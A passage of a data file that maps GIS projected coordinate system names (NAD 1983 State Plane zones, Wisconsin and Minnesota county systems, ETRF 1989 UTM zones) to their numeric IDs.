'NAD_1983_StatePlane_Alabama_West_FIPS_0102_Feet': 102630, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001_Feet': 102631, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002_Feet': 102632, 
'NAD_1983_StatePlane_Alaska_3_FIPS_5003_Feet': 102633, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004_Feet': 102634, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005_Feet': 102635, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006_Feet': 102636, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007_Feet': 102637, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008_Feet': 102638, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009_Feet': 102639, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010_Feet': 102640, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 102641, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 102642, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 102643, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 102644, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 102645, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 102646, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet': 102648, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet': 102649, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet': 102650, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 102651, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 102652, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 102653, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 102654, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 102655, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 102656, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 102657, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 102658, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 102659, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 102660, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101_Feet': 102661, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102_Feet': 102662, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 102663, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104_Feet': 102664, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105_Feet': 102665, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 102666, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 102667, 
'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 102668, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 102669, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 102670, 'NAD_1983_StatePlane_Illinois_East_FIPS_1201_Feet': 102671, 'NAD_1983_StatePlane_Illinois_West_FIPS_1202_Feet': 102672, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 102673, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 102674, 'NAD_1983_StatePlane_Iowa_North_FIPS_1401_Feet': 102675, 'NAD_1983_StatePlane_Iowa_South_FIPS_1402_Feet': 102676, 'NAD_1983_StatePlane_Kansas_North_FIPS_1501_Feet': 102677, 'NAD_1983_StatePlane_Kansas_South_FIPS_1502_Feet': 102678, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 102679, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 102680, 'NAD_1983_StatePlane_Louisiana_North_FIPS_1701_Feet': 102681, 'NAD_1983_StatePlane_Louisiana_South_FIPS_1702_Feet': 102682, 'NAD_1983_StatePlane_Maine_East_FIPS_1801_Feet': 102683, 'NAD_1983_StatePlane_Maine_West_FIPS_1802_Feet': 102684, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 102685, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 102686, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 102687, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet': 102688, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet': 102689, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet': 102690, 'NAD_1983_StatePlane_Minnesota_North_FIPS_2201_Feet': 102691, 'NAD_1983_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102692, 'NAD_1983_StatePlane_Minnesota_South_FIPS_2203_Feet': 102693, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 102694, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 102695, 'NAD_1983_StatePlane_Missouri_East_FIPS_2401_Feet': 102696, 'NAD_1983_StatePlane_Missouri_Central_FIPS_2402_Feet': 102697, 'NAD_1983_StatePlane_Missouri_West_FIPS_2403_Feet': 102698, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet': 102700, 'NAD_1983_StatePlane_Nebraska_FIPS_2600_Feet': 102704, 
'NAD_1983_StatePlane_Nevada_East_FIPS_2701_Feet': 102707, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702_Feet': 102708, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703_Feet': 102709, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800_Feet': 102710, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900_Feet': 102711, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 102712, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 102713, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 102714, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 102715, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 102716, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 102717, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 102718, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 102719, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet': 102720, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet': 102721, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401_Feet': 102722, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402_Feet': 102723, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 102724, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 102725, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet': 102726, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet': 102727, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 102728, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 102729, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800_Feet': 102730, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet': 102733, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001_Feet': 102734, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002_Feet': 102735, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 102736, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 102737, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 102738, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 102739, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 102740, 
'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 102741, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet': 102742, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet': 102743, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet': 102744, 'NAD_1983_StatePlane_Vermont_FIPS_4400_Feet': 102745, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 102746, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 102747, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 102748, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 102749, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701_Feet': 102750, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702_Feet': 102751, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 102752, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 102753, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 102754, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901_Feet': 102755, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902_Feet': 102756, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903_Feet': 102757, 'NAD_1983_StatePlane_Wyoming_West_FIPS_4904_Feet': 102758, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200_Feet': 102761, 'NAD_1983_StatePlane_Kentucky_FIPS_1600_Feet': 102763, 'NAD_1983_StatePlane_Guam_FIPS_5400_Feet': 102766, 'NAD_1983_HARN_WISCRS_Adams_County_Meters': 103300, 'NAD_1983_HARN_WISCRS_Ashland_County_Meters': 103301, 'NAD_1983_HARN_WISCRS_Barron_County_Meters': 103302, 'NAD_1983_HARN_WISCRS_Bayfield_County_Meters': 103303, 'NAD_1983_HARN_WISCRS_Brown_County_Meters': 103304, 'NAD_1983_HARN_WISCRS_Buffalo_County_Meters': 103305, 'NAD_1983_HARN_WISCRS_Burnett_County_Meters': 103306, 'NAD_1983_HARN_WISCRS_Calumet_County_Meters': 103307, 'NAD_1983_HARN_WISCRS_Chippewa_County_Meters': 103308, 'NAD_1983_HARN_WISCRS_Clark_County_Meters': 103309, 'NAD_1983_HARN_WISCRS_Columbia_County_Meters': 103310, 'NAD_1983_HARN_WISCRS_Crawford_County_Meters': 103311, 'NAD_1983_HARN_WISCRS_Dane_County_Meters': 103312, 
'NAD_1983_HARN_WISCRS_Dodge_County_Meters': 103313, 'NAD_1983_HARN_WISCRS_Door_County_Meters': 103314, 'NAD_1983_HARN_WISCRS_Douglas_County_Meters': 103315, 'NAD_1983_HARN_WISCRS_Dunn_County_Meters': 103316, 'NAD_1983_HARN_WISCRS_EauClaire_County_Meters': 103317, 'NAD_1983_HARN_WISCRS_Florence_County_Meters': 103318, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Meters': 103319, 'NAD_1983_HARN_WISCRS_Forest_County_Meters': 103320, 'NAD_1983_HARN_WISCRS_Grant_County_Meters': 103321, 'NAD_1983_HARN_WISCRS_Green_County_Meters': 103322, 'NAD_1983_HARN_WISCRS_GreenLake_County_Meters': 103323, 'NAD_1983_HARN_WISCRS_Iowa_County_Meters': 103324, 'NAD_1983_HARN_WISCRS_Iron_County_Meters': 103325, 'NAD_1983_HARN_WISCRS_Jackson_County_Meters': 103326, 'NAD_1983_HARN_WISCRS_Jefferson_County_Meters': 103327, 'NAD_1983_HARN_WISCRS_Juneau_County_Meters': 103328, 'NAD_1983_HARN_WISCRS_Kenosha_County_Meters': 103329, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Meters': 103330, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Meters': 103331, 'NAD_1983_HARN_WISCRS_Lafayette_County_Meters': 103332, 'NAD_1983_HARN_WISCRS_Langlade_County_Meters': 103333, 'NAD_1983_HARN_WISCRS_Lincoln_County_Meters': 103334, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Meters': 103335, 'NAD_1983_HARN_WISCRS_Marathon_County_Meters': 103336, 'NAD_1983_HARN_WISCRS_Marinette_County_Meters': 103337, 'NAD_1983_HARN_WISCRS_Marquette_County_Meters': 103338, 'NAD_1983_HARN_WISCRS_Menominee_County_Meters': 103339, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Meters': 103340, 'NAD_1983_HARN_WISCRS_Monroe_County_Meters': 103341, 'NAD_1983_HARN_WISCRS_Oconto_County_Meters': 103342, 'NAD_1983_HARN_WISCRS_Oneida_County_Meters': 103343, 'NAD_1983_HARN_WISCRS_Outagamie_County_Meters': 103344, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Meters': 103345, 'NAD_1983_HARN_WISCRS_Pepin_County_Meters': 103346, 'NAD_1983_HARN_WISCRS_Pierce_County_Meters': 103347, 'NAD_1983_HARN_WISCRS_Polk_County_Meters': 103348, 'NAD_1983_HARN_WISCRS_Portage_County_Meters': 103349, 
'NAD_1983_HARN_WISCRS_Price_County_Meters': 103350, 'NAD_1983_HARN_WISCRS_Racine_County_Meters': 103351, 'NAD_1983_HARN_WISCRS_Richland_County_Meters': 103352, 'NAD_1983_HARN_WISCRS_Rock_County_Meters': 103353, 'NAD_1983_HARN_WISCRS_Rusk_County_Meters': 103354, 'NAD_1983_HARN_WISCRS_Sauk_County_Meters': 103355, 'NAD_1983_HARN_WISCRS_Sawyer_County_Meters': 103356, 'NAD_1983_HARN_WISCRS_Shawano_County_Meters': 103357, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Meters': 103358, 'NAD_1983_HARN_WISCRS_St_Croix_County_Meters': 103359, 'NAD_1983_HARN_WISCRS_Taylor_County_Meters': 103360, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Meters': 103361, 'NAD_1983_HARN_WISCRS_Vernon_County_Meters': 103362, 'NAD_1983_HARN_WISCRS_Vilas_County_Meters': 103363, 'NAD_1983_HARN_WISCRS_Walworth_County_Meters': 103364, 'NAD_1983_HARN_WISCRS_Washburn_County_Meters': 103365, 'NAD_1983_HARN_WISCRS_Washington_County_Meters': 103366, 'NAD_1983_HARN_WISCRS_Waukesha_County_Meters': 103367, 'NAD_1983_HARN_WISCRS_Waupaca_County_Meters': 103368, 'NAD_1983_HARN_WISCRS_Waushara_County_Meters': 103369, 'NAD_1983_HARN_WISCRS_Winnebago_County_Meters': 103370, 'NAD_1983_HARN_WISCRS_Wood_County_Meters': 103371, 'NAD_1983_HARN_WISCRS_Adams_County_Feet': 103400, 'NAD_1983_HARN_WISCRS_Ashland_County_Feet': 103401, 'NAD_1983_HARN_WISCRS_Barron_County_Feet': 103402, 'NAD_1983_HARN_WISCRS_Bayfield_County_Feet': 103403, 'NAD_1983_HARN_WISCRS_Brown_County_Feet': 103404, 'NAD_1983_HARN_WISCRS_Buffalo_County_Feet': 103405, 'NAD_1983_HARN_WISCRS_Burnett_County_Feet': 103406, 'NAD_1983_HARN_WISCRS_Calumet_County_Feet': 103407, 'NAD_1983_HARN_WISCRS_Chippewa_County_Feet': 103408, 'NAD_1983_HARN_WISCRS_Clark_County_Feet': 103409, 'NAD_1983_HARN_WISCRS_Columbia_County_Feet': 103410, 'NAD_1983_HARN_WISCRS_Crawford_County_Feet': 103411, 'NAD_1983_HARN_WISCRS_Dane_County_Feet': 103412, 'NAD_1983_HARN_WISCRS_Dodge_County_Feet': 103413, 'NAD_1983_HARN_WISCRS_Door_County_Feet': 103414, 'NAD_1983_HARN_WISCRS_Douglas_County_Feet': 
103415, 'NAD_1983_HARN_WISCRS_Dunn_County_Feet': 103416, 'NAD_1983_HARN_WISCRS_EauClaire_County_Feet': 103417, 'NAD_1983_HARN_WISCRS_Florence_County_Feet': 103418, 'NAD_1983_HARN_WISCRS_Fond_du_Lac_County_Feet': 103419, 'NAD_1983_HARN_WISCRS_Forest_County_Feet': 103420, 'NAD_1983_HARN_WISCRS_Grant_County_Feet': 103421, 'NAD_1983_HARN_WISCRS_Green_County_Feet': 103422, 'NAD_1983_HARN_WISCRS_GreenLake_County_Feet': 103423, 'NAD_1983_HARN_WISCRS_Iowa_County_Feet': 103424, 'NAD_1983_HARN_WISCRS_Iron_County_Feet': 103425, 'NAD_1983_HARN_WISCRS_Jackson_County_Feet': 103426, 'NAD_1983_HARN_WISCRS_Jefferson_County_Feet': 103427, 'NAD_1983_HARN_WISCRS_Juneau_County_Feet': 103428, 'NAD_1983_HARN_WISCRS_Kenosha_County_Feet': 103429, 'NAD_1983_HARN_WISCRS_Kewaunee_County_Feet': 103430, 'NAD_1983_HARN_WISCRS_LaCrosse_County_Feet': 103431, 'NAD_1983_HARN_WISCRS_Lafayette_County_Feet': 103432, 'NAD_1983_HARN_WISCRS_Langlade_County_Feet': 103433, 'NAD_1983_HARN_WISCRS_Lincoln_County_Feet': 103434, 'NAD_1983_HARN_WISCRS_Manitowoc_County_Feet': 103435, 'NAD_1983_HARN_WISCRS_Marathon_County_Feet': 103436, 'NAD_1983_HARN_WISCRS_Marinette_County_Feet': 103437, 'NAD_1983_HARN_WISCRS_Marquette_County_Feet': 103438, 'NAD_1983_HARN_WISCRS_Menominee_County_Feet': 103439, 'NAD_1983_HARN_WISCRS_Milwaukee_County_Feet': 103440, 'NAD_1983_HARN_WISCRS_Monroe_County_Feet': 103441, 'NAD_1983_HARN_WISCRS_Oconto_County_Feet': 103442, 'NAD_1983_HARN_WISCRS_Oneida_County_Feet': 103443, 'NAD_1983_HARN_WISCRS_Outagamie_County_Feet': 103444, 'NAD_1983_HARN_WISCRS_Ozaukee_County_Feet': 103445, 'NAD_1983_HARN_WISCRS_Pepin_County_Feet': 103446, 'NAD_1983_HARN_WISCRS_Pierce_County_Feet': 103447, 'NAD_1983_HARN_WISCRS_Polk_County_Feet': 103448, 'NAD_1983_HARN_WISCRS_Portage_County_Feet': 103449, 'NAD_1983_HARN_WISCRS_Price_County_Feet': 103450, 'NAD_1983_HARN_WISCRS_Racine_County_Feet': 103451, 'NAD_1983_HARN_WISCRS_Richland_County_Feet': 103452, 'NAD_1983_HARN_WISCRS_Rock_County_Feet': 103453, 
'NAD_1983_HARN_WISCRS_Rusk_County_Feet': 103454, 'NAD_1983_HARN_WISCRS_Sauk_County_Feet': 103455, 'NAD_1983_HARN_WISCRS_Sawyer_County_Feet': 103456, 'NAD_1983_HARN_WISCRS_Shawano_County_Feet': 103457, 'NAD_1983_HARN_WISCRS_Sheboygan_County_Feet': 103458, 'NAD_1983_HARN_WISCRS_St_Croix_County_Feet': 103459, 'NAD_1983_HARN_WISCRS_Taylor_County_Feet': 103460, 'NAD_1983_HARN_WISCRS_Trempealeau_County_Feet': 103461, 'NAD_1983_HARN_WISCRS_Vernon_County_Feet': 103462, 'NAD_1983_HARN_WISCRS_Vilas_County_Feet': 103463, 'NAD_1983_HARN_WISCRS_Walworth_County_Feet': 103464, 'NAD_1983_HARN_WISCRS_Washburn_County_Feet': 103465, 'NAD_1983_HARN_WISCRS_Washington_County_Feet': 103466, 'NAD_1983_HARN_WISCRS_Waukesha_County_Feet': 103467, 'NAD_1983_HARN_WISCRS_Waupaca_County_Feet': 103468, 'NAD_1983_HARN_WISCRS_Waushara_County_Feet': 103469, 'NAD_1983_HARN_WISCRS_Winnebago_County_Feet': 103470, 'NAD_1983_HARN_WISCRS_Wood_County_Feet': 103471, 'ETRF_1989_UTM_Zone_28N': 103528, 'ETRF_1989_UTM_Zone_29N': 103529, 'ETRF_1989_UTM_Zone_30N': 103530, 'ETRF_1989_UTM_Zone_31N': 103531, 'ETRF_1989_UTM_Zone_32N': 103532, 'ETRF_1989_UTM_Zone_33N': 103533, 'ETRF_1989_UTM_Zone_34N': 103534, 'ETRF_1989_UTM_Zone_35N': 103535, 'ETRF_1989_UTM_Zone_36N': 103536, 'ETRF_1989_UTM_Zone_37N': 103537, 'ETRF_1989_UTM_Zone_38N': 103538, 'ETRF_1989_TM_Baltic_1993': 103584, 'NAD_1983_HARN_Adj_MN_Aitkin_Meters': 103600, 'NAD_1983_HARN_Adj_MN_Clay_Meters': 103601, 'NAD_1983_HARN_Adj_MN_Clearwater_Meters': 103602, 'NAD_1983_HARN_Adj_MN_Hubbard_Meters': 103603, 'NAD_1983_HARN_Adj_MN_Lake_Meters': 103604, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Meters': 103605, 'NAD_1983_HARN_Adj_MN_Washington_Meters': 103606, 'NAD_1983_HARN_Adj_MN_Wilkin_Meters': 103607, 'NAD_1983_HARN_Adj_MN_Anoka_Meters': 103608, 'NAD_1983_HARN_Adj_MN_Becker_Meters': 103609, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Meters': 103610, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Meters': 103611, 'NAD_1983_HARN_Adj_MN_Benton_Meters': 103612, 
'NAD_1983_HARN_Adj_MN_Big_Stone_Meters': 103613, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Meters': 103614, 'NAD_1983_HARN_Adj_MN_Brown_Meters': 103615, 'NAD_1983_HARN_Adj_MN_Carlton_Meters': 103616, 'NAD_1983_HARN_Adj_MN_Carver_Meters': 103617, 'NAD_1983_HARN_Adj_MN_Cass_North_Meters': 103618, 'NAD_1983_HARN_Adj_MN_Cass_South_Meters': 103619, 'NAD_1983_HARN_Adj_MN_Chippewa_Meters': 103620, 'NAD_1983_HARN_Adj_MN_Chisago_Meters': 103621, 'NAD_1983_HARN_Adj_MN_Cook_North_Meters': 103622, 'NAD_1983_HARN_Adj_MN_Cook_South_Meters': 103623, 'NAD_1983_HARN_Adj_MN_Cottonwood_Meters': 103624, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Meters': 103625, 'NAD_1983_HARN_Adj_MN_Dakota_Meters': 103626, 'NAD_1983_HARN_Adj_MN_Dodge_Meters': 103627, 'NAD_1983_HARN_Adj_MN_Douglas_Meters': 103628, 'NAD_1983_HARN_Adj_MN_Faribault_Meters': 103629, 'NAD_1983_HARN_Adj_MN_Fillmore_Meters': 103630, 'NAD_1983_HARN_Adj_MN_Freeborn_Meters': 103631, 'NAD_1983_HARN_Adj_MN_Goodhue_Meters': 103632, 'NAD_1983_HARN_Adj_MN_Grant_Meters': 103633, 'NAD_1983_HARN_Adj_MN_Hennepin_Meters': 103634, 'NAD_1983_HARN_Adj_MN_Houston_Meters': 103635, 'NAD_1983_HARN_Adj_MN_Isanti_Meters': 103636, 'NAD_1983_HARN_Adj_MN_Itasca_North_Meters': 103637, 'NAD_1983_HARN_Adj_MN_Itasca_South_Meters': 103638, 'NAD_1983_HARN_Adj_MN_Jackson_Meters': 103639, 'NAD_1983_HARN_Adj_MN_Kanabec_Meters': 103640, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Meters': 103641, 'NAD_1983_HARN_Adj_MN_Kittson_Meters': 103642, 'NAD_1983_HARN_Adj_MN_Koochiching_Meters': 103643, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Meters': 103644, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_North_Meters': 103645, 'NAD_1983_HARN_Adj_MN_Lake_of_the_Woods_South_Meters': 103646, 'NAD_1983_HARN_Adj_MN_Le_Sueur_Meters': 103647, 'NAD_1983_HARN_Adj_MN_Lincoln_Meters': 103648, 'NAD_1983_HARN_Adj_MN_Lyon_Meters': 103649, 'NAD_1983_HARN_Adj_MN_McLeod_Meters': 103650, 'NAD_1983_HARN_Adj_MN_Mahnomen_Meters': 103651, 'NAD_1983_HARN_Adj_MN_Marshall_Meters': 103652, 'NAD_1983_HARN_Adj_MN_Martin_Meters': 103653, 
'NAD_1983_HARN_Adj_MN_Meeker_Meters': 103654, 'NAD_1983_HARN_Adj_MN_Morrison_Meters': 103655, 'NAD_1983_HARN_Adj_MN_Mower_Meters': 103656, 'NAD_1983_HARN_Adj_MN_Murray_Meters': 103657, 'NAD_1983_HARN_Adj_MN_Nicollet_Meters': 103658, 'NAD_1983_HARN_Adj_MN_Nobles_Meters': 103659, 'NAD_1983_HARN_Adj_MN_Norman_Meters': 103660, 'NAD_1983_HARN_Adj_MN_Olmsted_Meters': 103661, 'NAD_1983_HARN_Adj_MN_Ottertail_Meters': 103662, 'NAD_1983_HARN_Adj_MN_Pennington_Meters': 103663, 'NAD_1983_HARN_Adj_MN_Pine_Meters': 103664, 'NAD_1983_HARN_Adj_MN_Pipestone_Meters': 103665, 'NAD_1983_HARN_Adj_MN_Polk_Meters': 103666, 'NAD_1983_HARN_Adj_MN_Pope_Meters': 103667, 'NAD_1983_HARN_Adj_MN_Ramsey_Meters': 103668, 'NAD_1983_HARN_Adj_MN_Red_Lake_Meters': 103669, 'NAD_1983_HARN_Adj_MN_Redwood_Meters': 103670, 'NAD_1983_HARN_Adj_MN_Renville_Meters': 103671, 'NAD_1983_HARN_Adj_MN_Rice_Meters': 103672, 'NAD_1983_HARN_Adj_MN_Rock_Meters': 103673, 'NAD_1983_HARN_Adj_MN_Roseau_Meters': 103674, 'NAD_1983_HARN_Adj_MN_St_Louis_North_Meters': 103675, 'NAD_1983_HARN_Adj_MN_St_Louis_Central_Meters': 103676, 'NAD_1983_HARN_Adj_MN_St_Louis_South_Meters': 103677, 'NAD_1983_HARN_Adj_MN_Scott_Meters': 103678, 'NAD_1983_HARN_Adj_MN_Sherburne_Meters': 103679, 'NAD_1983_HARN_Adj_MN_Sibley_Meters': 103680, 'NAD_1983_HARN_Adj_MN_Stearns_Meters': 103681, 'NAD_1983_HARN_Adj_MN_Steele_Meters': 103682, 'NAD_1983_HARN_Adj_MN_Stevens_Meters': 103683, 'NAD_1983_HARN_Adj_MN_Swift_Meters': 103684, 'NAD_1983_HARN_Adj_MN_Todd_Meters': 103685, 'NAD_1983_HARN_Adj_MN_Traverse_Meters': 103686, 'NAD_1983_HARN_Adj_MN_Wabasha_Meters': 103687, 'NAD_1983_HARN_Adj_MN_Wadena_Meters': 103688, 'NAD_1983_HARN_Adj_MN_Waseca_Meters': 103689, 'NAD_1983_HARN_Adj_MN_Watonwan_Meters': 103690, 'NAD_1983_HARN_Adj_MN_Winona_Meters': 103691, 'NAD_1983_HARN_Adj_MN_Wright_Meters': 103692, 'NAD_1983_HARN_Adj_MN_Yellow_Medicine_Meters': 103693, 'NAD_1983_HARN_Adj_MN_Aitkin_Feet': 103700, 'NAD_1983_HARN_Adj_MN_Clay_Feet': 103701, 
'NAD_1983_HARN_Adj_MN_Clearwater_Feet': 103702, 'NAD_1983_HARN_Adj_MN_Hubbard_Feet': 103703, 'NAD_1983_HARN_Adj_MN_Lake_Feet': 103704, 'NAD_1983_HARN_Adj_MN_Mille_Lacs_Feet': 103705, 'NAD_1983_HARN_Adj_MN_Washington_Feet': 103706, 'NAD_1983_HARN_Adj_MN_Wilkin_Feet': 103707, 'NAD_1983_HARN_Adj_MN_Anoka_Feet': 103708, 'NAD_1983_HARN_Adj_MN_Becker_Feet': 103709, 'NAD_1983_HARN_Adj_MN_Beltrami_North_Feet': 103710, 'NAD_1983_HARN_Adj_MN_Beltrami_South_Feet': 103711, 'NAD_1983_HARN_Adj_MN_Benton_Feet': 103712, 'NAD_1983_HARN_Adj_MN_Big_Stone_Feet': 103713, 'NAD_1983_HARN_Adj_MN_Blue_Earth_Feet': 103714, 'NAD_1983_HARN_Adj_MN_Brown_Feet': 103715, 'NAD_1983_HARN_Adj_MN_Carlton_Feet': 103716, 'NAD_1983_HARN_Adj_MN_Carver_Feet': 103717, 'NAD_1983_HARN_Adj_MN_Cass_North_Feet': 103718, 'NAD_1983_HARN_Adj_MN_Cass_South_Feet': 103719, 'NAD_1983_HARN_Adj_MN_Chippewa_Feet': 103720, 'NAD_1983_HARN_Adj_MN_Chisago_Feet': 103721, 'NAD_1983_HARN_Adj_MN_Cook_North_Feet': 103722, 'NAD_1983_HARN_Adj_MN_Cook_South_Feet': 103723, 'NAD_1983_HARN_Adj_MN_Cottonwood_Feet': 103724, 'NAD_1983_HARN_Adj_MN_Crow_Wing_Feet': 103725, 'NAD_1983_HARN_Adj_MN_Dakota_Feet': 103726, 'NAD_1983_HARN_Adj_MN_Dodge_Feet': 103727, 'NAD_1983_HARN_Adj_MN_Douglas_Feet': 103728, 'NAD_1983_HARN_Adj_MN_Faribault_Feet': 103729, 'NAD_1983_HARN_Adj_MN_Fillmore_Feet': 103730, 'NAD_1983_HARN_Adj_MN_Freeborn_Feet': 103731, 'NAD_1983_HARN_Adj_MN_Goodhue_Feet': 103732, 'NAD_1983_HARN_Adj_MN_Grant_Feet': 103733, 'NAD_1983_HARN_Adj_MN_Hennepin_Feet': 103734, 'NAD_1983_HARN_Adj_MN_Houston_Feet': 103735, 'NAD_1983_HARN_Adj_MN_Isanti_Feet': 103736, 'NAD_1983_HARN_Adj_MN_Itasca_North_Feet': 103737, 'NAD_1983_HARN_Adj_MN_Itasca_South_Feet': 103738, 'NAD_1983_HARN_Adj_MN_Jackson_Feet': 103739, 'NAD_1983_HARN_Adj_MN_Kanabec_Feet': 103740, 'NAD_1983_HARN_Adj_MN_Kandiyohi_Feet': 103741, 'NAD_1983_HARN_Adj_MN_Kittson_Feet': 103742, 'NAD_1983_HARN_Adj_MN_Koochiching_Feet': 103743, 'NAD_1983_HARN_Adj_MN_Lac_Qui_Parle_Feet': 103744, 
